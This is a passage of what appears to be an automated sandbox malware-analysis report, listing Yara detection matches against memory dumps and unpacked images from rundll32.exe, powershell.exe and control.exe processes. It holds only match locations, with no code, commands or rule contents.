Source: Yara match File source: 00000003.00000003.347265097.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.454702923.0000000006628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.472223678.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394403969.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.392369617.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.472064443.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 344, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6736, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 720, type: MEMORYSTR
Source: Yara match File source: 3.3.rundll32.exe.51194a0.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.51194a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5796940.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.5240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.57694a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.56ea4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.56ea4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.517576476.0000000005119000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.524999035.000000000546F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.469785731.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.469105501.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.518835628.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.471017124.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394225143.00000000056EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394254526.0000000005769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY